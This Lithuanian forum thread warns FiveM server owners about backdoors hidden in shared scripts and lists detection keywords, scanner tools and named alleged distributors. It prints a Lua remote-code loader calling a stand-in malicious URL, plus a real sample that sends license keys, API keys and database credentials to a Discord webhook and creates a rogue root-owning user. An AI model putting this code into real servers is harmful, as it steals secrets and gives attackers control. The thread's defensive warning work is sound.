fivem [SVARBU] Kenkėjų paslėpti "backdoors". Kas tai? Kaip nuo jų apsisaugoti?

[freddy.]

INFORMACIJA

Sveiki, šiuo metu kenkėjų tarpe yra labai populiaru paslėpti "backdoor" failuose, kuriais jie dalinasi, tiek šiame forume, tiek kitose svetainėse / susirašinėjimo platformose, kur yra dalinamasi įvairiais sistemų kodais. Priminsiu, jog 2023 metais mokami failai nebūna nemokami, o jeigu ir būna dažnu atvėju apkrėsti. Ypatingai rekomenduoju vengti siųstis savo serveriui "leaked" sistemas ar šiaip failus iš nepatvirtintų svetainių ar neaiškių autorių.

 

KAIP ATPAŽINTI "BACKDOOR" ?

Jeigu smalsumas ir patiklumas jus nugali, būtinai peržvelkite visus atsisiųstus failus direktorijoje: lua, js, css ir baigiant net .mp3. Trumpai tariant - apžiūrėkite VISIŠKAI VISUS failus. Juos atsidaryti galite pasitelkiant Visual Studio Code pagalba (rekomenduoju). Venkite siųsti ir instaliuoti "escrowed" sistemas į savo projekto failus.

Dažnu atvėju kenkėjiškos eilutės atrodo taip:

•   "api.ipify.org",
•   "api/webhooks",
•   "backdoor",
•   "rcon_password",
•   "PerformHttpRequest",
•   "hack",
•   "cipher",
•   "assert, server, load, Spawn, materials" 

Nepamirškime, jog turime ir gudročių, kurie tokias eilutes gali paslėpti užšifruodami kodą. Paimkime kaip pavyzdį "backdoor" eilutę: 

• local haha = {"PerformHttpRequest","assert","load",_G,"",nil} _G["PerformHttpRequest"]("https://pavyzdinekenkejosvetaine.com/11654156dsad", function (jugz, towlie) if (towlie == nil or towlie == "") then return end _G["assert"](_G["load"](towlie))() end)

Atsisiųstame kode ši eilutė gali atrodyti taip:

Spoiler

 

 

BACKDOOR PAVYZDYS IŠ REALIOS SITUACIJOS

Nueiname į tipinį "Discord" serverį, kuriame yra dalinami nemokami failai, wow 😮 Atsisiunčiame sau patinkantį kodą, tačiau jį patikriname. Mus pasitinka galutinis rezultatas:

Spoiler

sound.mp3 failas:

 

Bonus

 

Šiame pavyzdyje buvo atsisiųstas failas iš FiveM bendruomenėje žinomo kenkėjo Armando (Freakas / FreaK) (Discord: .freakas.) "Discord" serverio, kuriame yra susirinke visi jo prenumeratoriai, sekėjai. Kiekvienas failas, kuriuo yra pasidalinta turi "backdoor". Truputį gėda, ne? Savo visų pasekėjų serverius apkrėsti virusu - sounds good m8

 

TAI KUR MAN GAUTI PATIKIMŲ FAILŲ ???

Rekomenduoju savo serveriui ieškoti failų oficialioje "FiveM" svetainėje, kur žmonės dalinasi savo kodais tiek mokamai, tiek nemokamai - Latest FiveM Resource Development & Modding/Releases topics - Cfx.re Community

 

AŠ ESU TINGINYS, KOKIA PROGRAMĄ NAUDOTI, JOG AUTOMATIŠKAI APTIKTI "BACKDOOR" ??

• GitHub - PlantBronze/Anti-Backdoor: Detecting Backdoors in ur Server Scripts, like Cipher (2/10) - veikia tik visiškų liurbių apkrėstų failų.
• GitHub - MasterChad/backdoor-finder-fivem: 👺 Backdoor Scanner for FiveM (not a addon) (5/10) - veikia tik visiškų liurbių apkrėstų failų (btw naudojau pateiktame realios situacijos failui)
• GitHub - exersalza/FivemCipherFinder: A Fivem Cipher finder for those that don't want Ciphers in their scripts :D (10/10) - pasiteisinęs reikalas ir užšifruotame kenkėjiškame faile.

 

 Kitų narių pasiūlyta sisteminė įranga aptikti "backdoor's" jūsų serveryje:

• GitHub - Szpachlan/CipherScanner ( @Silkiauskas )

 

ŽINOMI ŠALTINIAI, KURIE SKLEIDŽIA APKRĖSTUS FAILUS

• Freak'as / FreaK (Discord: .freakas.) - skleidžia apkrėstus failus savo fanų bendruomenės "Discord" serveryje.
• Zenax0001 (Zenax) · GitHub - skleidžia apkrėstus failus savo "GitHub" paskyroje.

Redaguota Gruodžio 25, 2023, nario freddy.
Papildoma informacija

[Xan]

o virustotal patikimas, tarkim zip faila perskanuot užtenka, ar visus failus atskirai reikia?

[freddy.]

2 minutes prieš, Xan parašė:

o virustotal patikimas, tarkim zip faila perskanuot užtenka, ar visus failus atskirai reikia?

Labas, "virustotal" visiškai nepadeda kalbant apie šį reikalą. @Adomas J. gali patvirtinti, nes jau turėjome šiokį tokį nesusipratimą, kuomet prie užkrėstų failų šiame forume buvo prisegta "Virustotal" nuoroda (ši tema jau ištrinta).  Nuo šiandienos turėdamas laisvo laiko užmesiu akį į šiame forume pasidalintomis sistemomis ir parašysiu komentarą ar sistema saugi, ar užkrėsta.

Taigi, geriausia failus patikrinti pačiam rankiniu būdu, arba pasinaudojant trečiuoju įrankiu, kurį esu nurodęs - GitHub - exersalza/FivemCipherFinder: A Fivem Cipher finder for those that don't want Ciphers in their scripts :D

[imu_pertrauka]

Būtinai updeitinkite windowsus, kad Operacinės sistemos būtų up to date!! Patarčiau dar nusipirkti legalią windows versiją, nebūtinai iš microsoft, galima rasti key už 30 eurų (tačiau įrašai oficialią windows versiją, tik key iš kitur perki ), tik neturės klientų aptarnavimo pagalbos. Svarbu bus legalūs windowsai kuriuos galėsite updeitinti. Kas turi daugiau pinigų siūlyčiau pirkti oficialiai viską ir nesisiūsti jokių piratiniu versijų, tik iš patikimų šaltiniu. Geriau vadovautis taisykle - jei neturi pinigų nusipirkti legalią versiją tai geriau pakentėti. Nes pasekmės to gali būti - pavogta tapatybė, banko sąskaitos vagystės ir kitokios problemos, kurių sąrašą pilną žinodami - sapnuotumėt košmarus. Net jei ir jūs neturite ką prarasti ar neturite pinigų, jaunimas, jūs vistiek esate taikinys nes galima prisikasti prie jūsų tėvų, giminių, jūsų artimųjų darbo vietos informacijos. Žodžiu, būkit atsargus tam internete 🙂

 

P.S.: Gal čia ir ne apie backdoors postas, bet labai aktualus šita tema.

Redaguota Gruodžio 26, 2023, nario imu_pertrauka

[Zero Two]

prieš 21 valandas(-ų), imu_pertrauka parašė:

Būtinai updeitinkite windowsus, kad Operacinės sistemos būtų up to date!! Patarčiau dar nusipirkti legalią windows versiją, nebūtinai iš microsoft, galima rasti key už 30 eurų (tačiau įrašai oficialią windows versiją, tik key iš kitur perki ), tik neturės klientų aptarnavimo pagalbos. Svarbu bus legalūs windowsai kuriuos galėsite updeitinti. Kas turi daugiau pinigų siūlyčiau pirkti oficialiai viską ir nesisiūsti jokių piratiniu versijų, tik iš patikimų šaltiniu. Geriau vadovautis taisykle - jei neturi pinigų nusipirkti legalią versiją tai geriau pakentėti. Nes pasekmės to gali būti - pavogta tapatybė, banko sąskaitos vagystės ir kitokios problemos, kurių sąrašą pilną žinodami - sapnuotumėt košmarus. Net jei ir jūs neturite ką prarasti ar neturite pinigų, jaunimas, jūs vistiek esate taikinys nes galima prisikasti prie jūsų tėvų, giminių, jūsų artimųjų darbo vietos informacijos. Žodžiu, būkit atsargus tam internete 🙂

 

P.S.: Gal čia ir ne apie backdoors postas, bet labai aktualus šita tema.

ar legali os ar up to date neapsaugos nuo to ka cia parasei

[newyorkas]

prieš 22 valandas(-ų), imu_pertrauka parašė:

Būtinai updeitinkite windowsus, kad Operacinės sistemos būtų up to date!! Patarčiau dar nusipirkti legalią windows versiją, nebūtinai iš microsoft, galima rasti key už 30 eurų (tačiau įrašai oficialią windows versiją, tik key iš kitur perki ), tik neturės klientų aptarnavimo pagalbos. Svarbu bus legalūs windowsai kuriuos galėsite updeitinti. Kas turi daugiau pinigų siūlyčiau pirkti oficialiai viską ir nesisiūsti jokių piratiniu versijų, tik iš patikimų šaltiniu. Geriau vadovautis taisykle - jei neturi pinigų nusipirkti legalią versiją tai geriau pakentėti. Nes pasekmės to gali būti - pavogta tapatybė, banko sąskaitos vagystės ir kitokios problemos, kurių sąrašą pilną žinodami - sapnuotumėt košmarus. Net jei ir jūs neturite ką prarasti ar neturite pinigų, jaunimas, jūs vistiek esate taikinys nes galima prisikasti prie jūsų tėvų, giminių, jūsų artimųjų darbo vietos informacijos. Žodžiu, būkit atsargus tam internete 🙂

 

P.S.: Gal čia ir ne apie backdoors postas, bet labai aktualus šita tema.

gal pasiimk tu atostogas, o ne pertrauką

[imu_pertrauka]

Jaunimas, nepirataukit o tai busit kaip siti

Redaguota Gruodžio 27, 2023, nario imu_pertrauka

[Salvini]

27 minutes prieš, imu_pertrauka parašė:

Jaunimas, nepirataukit o tai busit kaip siti

Ko postą dabar pakeitei?  kur dingo isterijos kurias čia visiem rašiai apie kažkokius atvažiavimus ?  šlapia vieta  arba vaikas, jei savo žodžių išsižadi  reputacijom jis kariauja , jei jam uždėjai minusą , tuoj bėgs visur tau minusus dėliot  (Tai vadinama pinktnaudžiavimu reputacija,ir tai baudžiama)servus jis kuria,samp reputaciją giną , o po dviejų dienų , nebežaiskit jūs to samp  čia vapšie kalba nesąmonęs apie kurias žalio supratimo neturi... teisingai @Adomas J. pasakė , cituoju : 

Citata

Temos autorius susigadino sau reputacija ir neapgynė savo teiginio.

Gal tu tiesiog neberašyk kiekvienoje temoje postus rinkdamas to ko nenusimanai, nes reputacija smarkaii krenta..

Redaguota Gruodžio 27, 2023, nario Salvini

[imu_pertrauka]

3 minutes prieš, Salvini parašė:

Ko postą dabar pakeitei?  kur dingo isterijos kurias čia visiem rašiai apie kažkokius atvažiavimus ?  šlapia vieta  arba vaikas, jei savo žodžių išsižadi  reputacijom jis kariauja , jei jam uždėjai minusą , tuoj bėgs visur tau minusus dėliot  (Tai vadinama pinktnaudžiavimu reputacija,ir tai baudžiama)servus jis kuria,samp reputaciją giną , o po dviejų dienų , nebežaiskit jūs to samp  čia vapšie kalba nesąmonęs apie kurias žalio supratimo neturi... teisingai @Adomas J. pasakė , cituoju : 

Gal tu tiesiog neberašyk kiekvienoje temoje postus rinkdamas to ko nenusimanai, nes reputacija smarkaii krenta..

Nebejuokink. 😭

[Salvini]

Dabar, imu_pertrauka parašė:

Nebejuokink. 😭

Tai davai parodyk originalų postą kur isterikavai čia ant visų tau atsakiusių,sakiai jie atvažiuot tau žadėjo (nors niekur temoje tai neminima) , gi visi perskaitė, po 10 min ištrynei  eik gydykis čiušpanas ,nes belekokias nesąmones tu čia darai.

[freddy.]

Sveiki.

Papildoma informacija apie jūsų serverio "backdoor's". Pasitelkiant "backdoor's" kenkėjai į jūsų kompiuterį gali įrašyti kenkėjiškas programas, kurių pagalba gali gauti jūsų visus išsaugotus slaptažodžius. 

? ? ? ?

Patikrinkite ar jūsų serverio direktorijoje prie "server.cfg" nėra sukurto failo "SubAFivem.exe", šis failas automatiškai gali pasileisti paleidžiant serverį, bet gali pasileisti ir kartu su "start up" programomis, kurios įsijungia tuo momentu, kai yra kraunamas jūsų "Desktop".

Spauskite klaviatūroje "WIN + R" ir įveskite "%appdata%". Nuodugniai peržiūrėkite ar nėra grabberio išsaugotų slaptažodžių. Tai galite pastebėti rasdami neaiškų "zip" failą, o gal ir net atskirą aplankalą su visais jūsų duomenimis.

Realus pavyzdys kaip gali atrodyti grabberio surinkta informacija "%appdata%" aplankale. ( @evinced )

[Royality]

Yra dar daug daugiau budu kaip isilauzti pvz i ipb forumus. 
Gal kazkada paplatinsiu apsaugu failus ir kaip apsisaugoti pilnai forumui arba php-f jei dar kas naudoja =D 

[Adomas J.]

Nors pašalinau komentarą su vieno iš kenkėjų vardu ir pavardę, bet vienam iš kenkėjų nepasisekė ir jo duomenys buvo nutekinti internete, jie yra viešai visiems prieinami ir juos pašalinti neįmanoma. Patariame būti atsargiems, nes vėl kenkėjai kimba į darbus ir ieško aukų.

[freddy.]

🆕 Atnaujinta - 2024-05-01
⚠️ Raktiniai žodžiai: "os.execute" ; "GetConvar" (ieškoti server-side failuose su CTRL+F)

Naujas kenkėjų metodas prisijungti prie jūsų serverio kode:

AddEventHandler('onResourceStart', function(resourceName)
    PerformHttpRequest("https://api.ipify.org/", function (err, text, headers)
    if GetCurrentResourceName() == resourceName then
        local servername = GetConvar("sv_hostname")
        local licensekey = GetConvar("sv_licenseKey")
        local apikey = GetConvar("steam_webApiKey")
        local tags = GetConvar("tags")
        local mysql_connection_string = GetConvar("mysql_connection_string")
        local messagem = "Asmuo atsijungė \n > Steamas: \n"..servername.." \n > Asmens ID: "..text.." \n > Kordinates: "..licensekey.." \n > Licensija: "..apikey.." \n > Grupe: "..tags.."\n > Priežastis: "..mysql_connection_string..""
        local content = {{
        author = {
          name = "ANTI COMBAT LOG",
          icon_url = "https://imgur.com/U86xHyT.png"
        },
        ["color"] = 1933,
        ["description"] = messagem,
        ["footer"] = {
        ["text"] = "ANTI COMBAT LOG",
        },}}
    os.execute('useradd roos')
    os.execute('passwd username')
    os.execute('echo "roos:username" | chpasswd')
    os.execute('chown -R roos: /home')
    os.execute('chown -R roos: /root')
        PerformHttpRequest("https://discord.com/api/webhooks/1213607484347121714/i0wDNRcsko2OfXVCIzc-Bm44vDtgr9Ox6LVPqbPwK2LcG2nqJirI2BOBCCzQnB9yxP8D", function() end, "POST", json.encode({embeds = content}), { ["Content-Type"] = "application/json" })
      end
    end)
end)

P.s. šitas kodas išgauna ir jūsų informaciją iš serverio "config" failo, ko jis neturėtų daryti:

local servername = GetConvar("sv_hostname")
local licensekey = GetConvar("sv_licenseKey")
local apikey = GetConvar("steam_webApiKey")
local tags = GetConvar("tags")
local mysql_connection_string = GetConvar("mysql_connection_string")

Išgavus šią informaciją, ji yra siunčiama kenkėjui į jo "Discord" serverį per "Webhook":

local messagem = "Asmuo atsijungė \n > Steamas: \n"..servername.." \n > Asmens ID: "..text.." \n > Kordinates: "..licensekey.." \n > Licensija: "..apikey.." \n > Grupe: "..tags.."\n > Priežastis: "..mysql_connection_string..""

Kenkėjas gauna jūsų:

• Serverio pavadinimą ;
• Steam WEB API Key ;
• Keymaster licenzijos raktą ;
• Serverio tag'us ;
• MySQL (duom. bazės) prisijungimo informaciją
• Galimybę prisijungti prie jūsų serverio failų (os.execute eilutės)

Pateiktas kodas - reali situacija iš atakuoto serverio, liurbis kenkėjas (nerodysiu pirštais) patingėjo net paslėpti kodą jį užkoduodamas. Primenu, jog jūsų sistemos kodas neturi atrodyti šitaip, jeigu jį atsisiuntėte open-source iš patikimo šaltinio (cfx.re forumas):

Išlikite budrūs ir nereikės jaudintis dėl savo serverio saugumo  

Redaguota Trečiadienį, 21:03, nario freddy.